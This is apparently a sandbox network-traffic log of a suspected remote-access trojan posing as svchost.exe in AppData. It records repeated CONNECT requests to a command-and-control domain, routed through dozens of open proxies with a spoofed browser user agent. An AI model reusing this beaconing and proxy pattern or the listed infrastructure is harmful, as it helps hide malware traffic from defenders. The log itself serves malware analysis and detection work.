
Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3470	192.168.2.5	60958	43.131.248.165	15673	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.579385042 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3471	192.168.2.5	60948	185.158.114.14	25697	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.579464912 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3472	192.168.2.5	60949	43.155.130.182	15673	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.579514027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3473	192.168.2.5	60947	110.12.211.140	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.579520941 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3474	192.168.2.5	60978	5.44.42.115	58386	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.612375021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3475	192.168.2.5	60986	1.15.62.12	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.621536970 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3476	192.168.2.5	60984	106.105.218.244	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.644799948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3477	192.168.2.5	60664	178.128.200.87	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.645279884 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3478	192.168.2.5	60983	138.2.73.157	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.667685032 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3479	192.168.2.5	60788	51.15.139.59	16379	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.672277927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3480	192.168.2.5	60175	142.54.226.214	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.674263954 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3481	192.168.2.5	60852	137.184.100.135	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.701417923 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3482	192.168.2.5	59947	59.124.62.9	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.729679108 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3483	192.168.2.5	61006	104.19.83.128	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.731926918 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.886523008 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:36 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3484	192.168.2.5	60992	43.155.170.35	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.740544081 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3485	192.168.2.5	61177	43.153.175.43	443	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.761375904 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3486	192.168.2.5	61185	43.153.175.43	443	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.764889002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3487	192.168.2.5	61192	43.153.175.43	443	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.767954111 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3488	192.168.2.5	60869	139.162.238.184	22243	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.768064976 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3489	192.168.2.5	61195	43.153.175.43	443	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.770860910 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3490	192.168.2.5	61083	172.67.181.32	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.800712109 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.954778910 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:36 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3491	192.168.2.5	61074	34.49.208.221	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.809732914 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3492	192.168.2.5	59948	103.69.87.142	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.810033083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3493	192.168.2.5	61058	162.240.208.98	43704	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.812613010 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.366025925 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.974184036 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3494	192.168.2.5	60995	200.10.73.210	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.817298889 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3495	192.168.2.5	61112	104.19.85.214	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.822474957 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.976823092 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:36 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3496	192.168.2.5	60993	193.84.89.202	8443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.826975107 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3497	192.168.2.5	60990	211.93.2.190	7302	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.837344885 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:37.312161922 CET	90	IN	HTTP/1.1 200 OK Content-Type: application/json Connection: close Content-Length: 55

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3498	192.168.2.5	57343	12.186.205.122	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.842144966 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.031554937 CET	325	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.1 Date: Sat, 09 Mar 2024 12:14:36 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3499	192.168.2.5	60997	5.252.23.220	1081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.843518972 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3500	192.168.2.5	60994	78.30.128.10	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.848723888 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3501	192.168.2.5	57355	67.227.186.23	57676	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.854132891 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3502	192.168.2.5	61004	18.134.236.231	3128	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.860161066 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.154220104 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:37 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3503	192.168.2.5	61088	162.223.94.166	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.867439032 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.224852085 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3504	192.168.2.5	61094	199.229.254.129	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.875287056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3505	192.168.2.5	61007	95.164.89.123	8888	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.879527092 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3506	192.168.2.5	57306	104.248.158.78	61725	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.884104967 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3507	192.168.2.5	61011	92.205.110.118	7895	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.891103029 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.677169085 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.677710056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3508	192.168.2.5	61047	35.79.120.242	3128	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.893596888 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.159615993 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:37 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3509	192.168.2.5	61017	195.90.216.75	1080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.900515079 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3510	192.168.2.5	61013	110.12.211.140	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.907151937 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3511	192.168.2.5	60999	119.3.215.41	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.909985065 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

